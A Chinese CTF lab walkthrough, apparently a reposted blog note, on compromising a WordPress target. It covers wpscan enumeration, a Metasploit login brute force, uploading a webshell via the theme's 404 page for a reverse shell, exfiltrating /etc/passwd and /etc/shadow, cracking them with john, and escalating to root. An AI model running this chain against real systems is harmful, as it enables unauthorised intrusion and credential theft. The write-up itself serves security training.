zoukankan      html  css  js  c++  java
  • ctf-web-WEB安全暴力破解(wp破解、passwd和shadow破解)思路笔记

    1. 信息探测

      1. image
      2. 分析结果,挖掘可利用信息
        1. 发现敏感文件,发现登陆界面:image
    2. 使用wpScan对站点用户名进行枚举

      1. 输入wpscan查看可使用的命令image
      2. image
      3. 初次使用wpscan需要更新,过程有点缓慢
      4. 获得用户名:admin
    3. 使用metasploit对wordpress站点进行暴力密码破解

      1. 启动Metasploit –> msfconsole
      2. msf > use auxilicry /scanner/http/wordpress_login_enum
      3. msf auxiliary(wordpress_login_enuml> set username adlmin
      4. msf auxiliary(wordpress_login_enum)> set pass_file /usr/share/wordlists/cirb/common.txt
      5. msf auxiliary(wordpress_login_enum) > set targeturi /secret/
      6. msf auxiliary(wordpress_login_enum) > set rhosts 192.168.1.13
      7. msf cuxiliary(wordpress_login_enum) > run
      8. 获得用户名和密码image
      9. 使用用户名和密码进行登陆
    4. 上传webshell获取控制权

      1. 生成shell:image
      2. 通过404页面上传shell:image
      3. 设置启动监听:image
      4. 访问404.php执行shell,获得反弹shellimage
      5. 查看系统信息sysinfo
      6. 加载shell: shell
      7. id
    5. 使用passwd和shadow提升root权限:

      1. -- Metasploit中利用返回shell下载download /etc/passwd  download /etc/shadow
      2. --将文件转换为join可以识别的文件格式
      3. unshadow passwd shadow > cracked
      4. --使用john破解密码:john crackedimage
      5. shellimage
      6. su- marlinspike
      7. sudo –limage
      8. 获得root:sudo bash
    6. 总结:

      1. 提权时可以抓取/etc/passwd和/etc/shadow,之后使用join来破解对应的密码,然后使用对应的用户名密码提升root权限;
      2. 对于wp的渗透中,启动对应的主题,然后在404页面上传shell;
      3. 渗透流程:发现wordpress-使用wpscan进行用户名枚举-使用msfconsole进行密码爆破-登陆后台-生成shell-启动监听-执行shell-获得反弹shell-下载passwd和shadow-使用passwd和shadow提升root权限-文件转换为join可以识别的文件格式-使用john破解密码-获得用户密码-返回反弹的shell-切换用户-提升权限-获取flag
  • 相关阅读:
    Excel多工作表快速汇总,简单才是硬道理
    Excel中的条件汇总函数,看过这些你就懂
    SUMPRODUCT函数详解
    关于iOS中的文本操作-管理text fields 和 text views
    ios开发之多线程资源争夺
    关于ios中的文本操作-简介
    ios开发小技巧之提示音播放与震动
    ios开发小技巧之摇一摇截屏
    ios开发之网络数据的下载与上传
    ios开发之网络访问的数据类型
  • 原文地址:https://www.cnblogs.com/zw7889/p/13595510.html
Copyright © 2011-2022 走看看